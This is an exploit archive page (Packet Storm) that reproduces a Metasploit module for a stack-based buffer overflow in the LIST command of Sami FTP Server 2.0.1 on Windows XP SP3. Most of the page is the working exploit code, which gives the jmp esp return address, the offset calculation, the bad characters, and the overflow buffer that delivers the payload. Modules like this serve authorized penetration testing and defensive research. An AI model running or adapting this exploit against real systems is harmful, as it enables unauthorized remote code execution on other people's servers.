exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Sami FTP Server LIST Command Buffer Overflow

Sami FTP Server LIST Command Buffer Overflow
Posted Mar 20, 2013
Authored by superkojiman | Site metasploit.com

This Metasploit module exploits a stack based buffer overflow on Sami FTP Server 2.0.1. The vulnerability exists in the processing of LIST commands. In order to trigger the vulnerability, the "Log" tab must be viewed in the Sami FTP Server managing application, in the target machine. On the other hand, the source IP address used to connect with the FTP Server is needed. If the user can't provide it, the module will try to resolve it. This Metasploit module has been tested successfully on Sami FTP Server 2.0.1 over Windows XP SP3.

tags | exploit, overflow
systems | windows
advisories | OSVDB-90815
SHA-256 | f2ce755b550afa23d41b892e96930bfc4c6426f8a8a9869ab6859d2655918b0e

Sami FTP Server LIST Command Buffer Overflow

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
Rank = LowRanking

include Msf::Exploit::Remote::Ftp

def initialize(info = {})
super(update_info(info,
'Name' => 'Sami FTP Server LIST Command Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1.
The vulnerability exists in the processing of LIST commands. In order to trigger
the vulnerability, the "Log" tab must be viewed in the Sami FTP Server managing
application, in the target machine. On the other hand, the source IP address used
to connect with the FTP Server is needed. If the user can't provide it, the module
will try to resolve it. This module has been tested successfully on Sami FTP Server
2.0.1 over Windows XP SP3.
},
'Platform' => 'win',
'Author' =>
[
'superkojiman', # Original exploit
'Doug Prostko <dougtko[at]gmail.com>' # MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '90815'],
[ 'BID', '58247'],
[ 'EDB', '24557']
],
'Privileged' => false,
'Payload' =>
{
'Space' => 1500,
'DisableNops' => true,
'BadChars' => "\x00\x0a\x0d\x20\x5c",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Targets' =>
[
[ 'Sami FTP Server 2.0.1 / Windows XP SP3',
{
'Ret' => 0x10028283, # jmp esp from C:\Program Files\PMSystem\Temp\tmp0.dll
'Offset' => 228
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 27 2013'))
register_options(
[
OptAddress.new('SOURCEIP', [false, 'The local client address'])
], self.class)
end

def exploit
connect
if datastore['SOURCEIP']
ip_length = datastore['SOURCEIP'].length
else
ip_length = Rex::Socket.source_address(rhost).length
end
buf = rand_text(target['Offset'] - ip_length)
buf << [ target['Ret'] ].pack('V')
buf << rand_text(16)
buf << payload.encoded
send_cmd( ['LIST', buf], false )
disconnect
end

end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close